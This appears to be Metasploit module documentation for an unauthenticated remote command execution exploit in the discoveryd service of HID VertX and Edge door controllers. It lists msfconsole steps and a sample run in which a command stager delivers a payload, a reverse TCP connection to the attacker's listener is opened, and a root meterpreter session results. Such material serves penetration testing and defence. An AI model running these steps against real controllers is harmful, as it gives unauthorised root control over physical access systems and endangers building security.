## Description

  This module exploits an unauthenticated remote command execution
  vulnerability in the `discoveryd` service exposed by HID VertX and Edge
  door controllers.


## Vulnerable Application

  This module was tested successfully on a HID Edge model EH400
  with firmware version 2.3.1.603 (Build 04/23/2012).


## Verification Steps

  1. Start `msfconsole`
  2. `use exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce`
  3. `set rhost [IP]`
  4. `set lhost [IP]`
  5. `run`
  6. You should get a *root* session


## Scenarios

  ```
  msf5 > use exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce 
  msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > set rhosts 10.123.123.123
  rhosts => 10.123.123.123
  msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > set lhost 10.1.1.197
  lhost => 10.1.1.197
  msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > run

  [*] Started reverse TCP handler on 10.1.1.197:4444 
  [*] 10.123.123.123:4070 - Connecting to target
  [*] Command Stager progress -   0.29% done (26/8993 bytes)
  [*] Command Stager progress -   0.58% done (52/8993 bytes)
  [*] Command Stager progress -   0.87% done (78/8993 bytes)
  [*] Command Stager progress -   1.16% done (104/8993 bytes)
  [...]
  [*] Command Stager progress -  98.88% done (8892/8993 bytes)
  [*] Command Stager progress -  99.17% done (8918/8993 bytes)
  [*] Command Stager progress -  99.46% done (8944/8993 bytes)
  [*] Command Stager progress -  99.68% done (8964/8993 bytes)
  [*] Sending stage (806208 bytes) to 10.123.123.123
  [*] Command Stager progress - 100.00% done (8993/8993 bytes)

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 10.123.123.123
  OS           :  (Linux 2.6.28)
  Architecture : armv5tejl
  BuildTuple   : armv5l-linux-musleabi
  Meterpreter  : armle/linux
  meterpreter > 
  ```

